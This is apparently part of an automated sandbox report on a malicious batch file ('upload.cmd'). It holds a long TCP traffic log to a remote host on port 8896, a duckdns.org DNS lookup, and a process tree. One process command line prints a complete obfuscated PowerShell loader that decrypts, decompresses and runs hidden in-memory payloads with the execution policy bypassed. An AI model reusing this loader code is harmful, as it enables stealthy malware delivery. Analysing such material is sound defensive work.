May 23, 2024 21:15:44.893301010 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:44.893501997 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:44.895773888 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:45.008511066 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:45.013271093 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:45.029891968 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:45.095257044 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:45.095434904 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:45.106190920 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:45.167670012 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:45.256822109 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:45.257345915 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:45.355721951 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:45.403871059 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:46.055619955 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:46.127533913 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:46.269021988 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:46.396028996 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:46.416121006 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:46.450148106 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:46.450225115 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:46.455172062 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:46.511560917 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:46.516664982 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:46.621512890 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:46.659099102 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:46.664103985 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:46.714060068 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:46.785835028 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:46.808500051 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:46.843775988 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:46.955004930 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:46.975457907 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:47.024112940 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:47.024187088 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:47.031548977 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:47.060425043 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:47.065459013 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:47.080064058 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:47.085341930 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:47.115963936 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:47.125745058 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:47.171314955 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:47.264015913 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:47.290380955 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:47.386550903 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:47.388164997 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:47.515774965 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:47.595712900 CEST  8896     49705    12.202.180.134  192.168.2.8
May 23, 2024 21:15:47.596185923 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:48.431042910 CEST  49705    8896     192.168.2.8     12.202.180.134
May 23, 2024 21:15:48.501390934 CEST  8896     49705    12.202.180.134  192.168.2.8
                              May 23, 2024 21:15:48.501457930 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:48.515273094 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.522311926 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:48.527137041 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.582015991 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:48.633116007 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.679429054 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.679507971 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:48.684931040 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.716078043 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:48.727163076 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.732165098 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.755554914 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:48.814105988 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.845138073 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.971683025 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:48.971769094 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:49.038806915 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:49.044905901 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:49.057074070 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:49.107319117 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:49.107328892 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:49.155739069 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:49.156112909 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:49.290102959 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:49.385185957 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:49.388173103 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:50.701823950 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:50.752159119 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:50.755815983 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:50.760912895 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:50.803832054 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:50.808805943 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:50.884599924 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:50.977572918 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:50.977633953 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:51.056982994 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:51.062037945 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.095180035 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:51.100004911 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.161345959 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.164156914 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:51.169085026 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.249171972 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.293661118 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:51.382122040 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.474773884 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:51.475209951 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.332269907 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.337636948 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.513700962 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.518969059 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.523972034 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.662242889 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.667298079 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.708508015 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.817754030 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.837404013 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.850938082 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.854260921 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.949508905 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:52.949584961 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:52.954660892 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.013650894 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.093357086 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:53.098819017 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.147377968 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.191836119 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.195324898 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:53.284425974 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.411072969 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:53.412041903 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.153958082 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.201585054 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.201637983 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.206907988 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.247319937 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.252207041 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.340960026 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.357180119 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.362210035 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.392139912 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.413161993 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.413435936 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.423208952 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.475614071 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.485841036 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.538755894 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.586807013 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.647835016 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.743336916 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.743355989 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.743391991 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.793008089 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.809294939 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.859299898 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:54.928031921 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:54.958081961 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:55.007587910 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:55.014149904 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:55.092657089 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:55.200067997 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:55.232897043 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:55.309428930 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:56.473444939 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:56.482058048 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:56.655563116 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:56.793807030 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:56.997558117 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:57.002597094 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:57.237687111 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:57.309315920 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:57.452334881 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:57.458388090 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:57.486051083 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:57.491919041 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:57.647878885 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:57.747672081 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:57.747807980 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.411432028 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.446376085 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.451508999 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.456597090 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.618105888 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.625961065 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.630958080 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.635838985 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.640882969 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.710678101 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.809472084 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.850207090 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:58.934645891 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:15:58.942678928 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:15:59.055193901 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:00.544766903 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:00.553581953 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:00.702147007 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:00.727688074 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:00.737605095 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:00.775778055 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:00.831330061 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:00.859926939 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:00.865106106 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:00.915396929 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.004642010 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.010304928 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.025506973 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.042376041 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.042609930 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.089458942 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.089519978 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.100302935 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.124720097 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.130855083 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.187258005 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.194246054 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.200730085 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.247437000 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.293756008 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.358112097 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.404222965 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:01.471445084 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.543272018 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:01.551377058 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.216259003 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.268621922 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.395402908 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.510449886 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.560065985 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.629549980 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.640683889 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.744282007 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.786333084 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.838769913 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.843606949 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.848668098 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.903110027 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.905108929 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.960935116 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:02.961011887 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:02.965936899 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.023905039 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.069879055 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.075066090 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.092533112 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.097547054 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.114770889 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.119826078 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.155982971 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.160923958 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.207282066 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.248150110 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.253098011 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.257811069 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.352768898 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.353116035 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.399219036 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.485162020 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.487787008 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:03.596590042 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:03.700103998 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:05.951406002 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:06.106743097 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.353575945 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.455487013 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.455581903 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.460980892 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.515336990 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.550564051 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.599350929 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.601552963 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.606491089 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.661026955 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.666112900 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.736763000 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.803745031 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.823812008 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:07.916465998 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:07.921529055 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:08.014694929 CEST88964970512.202.180.134192.168.2.8
                              May 23, 2024 21:16:08.014765024 CEST497058896192.168.2.812.202.180.134
                              May 23, 2024 21:16:13.924449921 CEST497058896192.168.2.812.202.180.134
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 23, 2024 21:13:08.411286116 CEST | 54240 | 53 | 192.168.2.8 | 1.1.1.1
May 23, 2024 21:13:08.532054901 CEST | 53 | 54240 | 1.1.1.1 | 192.168.2.8
May 23, 2024 21:13:18.930941105 CEST | 53 | 57290 | 1.1.1.1 | 192.168.2.8

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 23, 2024 21:13:08.411286116 CEST | 192.168.2.8 | 1.1.1.1 | 0x45df | Standard query (0) | xgmn934.duckdns.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 23, 2024 21:13:08.532054901 CEST | 1.1.1.1 | 192.168.2.8 | 0x45df | No error (0) | xgmn934.duckdns.org |  | 12.202.180.134 | A (IP address) | IN (0x0001) | false

                              Target ID:0
                              Start time:15:12:57
                              Start date:23/05/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\upload.cmd" "
                              Imagebase:0x7ff630480000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:2
                              Start time:15:12:57
                              Start date:23/05/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff6ee680000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:3
                              Start time:15:12:57
                              Start date:23/05/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c "set __=^&rem"
                              Imagebase:0x7ff630480000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:4
                              Start time:15:12:57
                              Start date:23/05/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RzMoOoy2KqgkIwy4RoRfj6IIwcpdKf2HW9dVyZHQs4E='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Au8minHRY/Rn0XwxZshhqQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gKmLj=New-Object System.IO.MemoryStream(,$param_var); $CUzzM=New-Object System.IO.MemoryStream; $xKhtn=New-Object System.IO.Compression.GZipStream($gKmLj, [IO.Compression.CompressionMode]::Decompress); $xKhtn.CopyTo($CUzzM); $xKhtn.Dispose(); $gKmLj.Dispose(); $CUzzM.Dispose(); $CUzzM.ToArray();}function execute_function($param_var,$param2_var){ $DUmer=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $qdtAj=$DUmer.EntryPoint; $qdtAj.Invoke($null, $param2_var);}$eQNwc = 'C:\Users\user\Desktop\upload.cmd';$host.UI.RawUI.WindowTitle = $eQNwc;$JWNvA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($eQNwc).Split([Environment]::NewLine);foreach ($gHmIc in $JWNvA) { if ($gHmIc.StartsWith('oyDvWzHHEgVkFmqgImzX')) { $PFglM=$gHmIc.Substring(20); break; }}$payloads_var=[string[]]$PFglM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
                              Imagebase:0x7ff630480000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:5
                              Start time:15:12:57
                              Start date:23/05/2024
                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass
                              Imagebase:0x7ff6cb6b0000
                              File size:452'608 bytes
                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:high
                              Has exited:true

                              Target ID:12
                              Start time:15:16:02
                              Start date:23/05/2024
                              Path:C:\Windows\System32\wermgr.exe
                              Wow64 process (32bit):false
                              Commandline:"C:\Windows\system32\wermgr.exe" "-outproc" "0" "5212" "2620" "1284" "2624" "0" "0" "2628" "0" "0" "0" "0" "0"
                              Imagebase:0x7ff61d450000
                              File size:229'728 bytes
                              MD5 hash:74A0194782E039ACE1F7349544DC1CF4
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Reputation:moderate
                              Has exited:true

                              No disassembly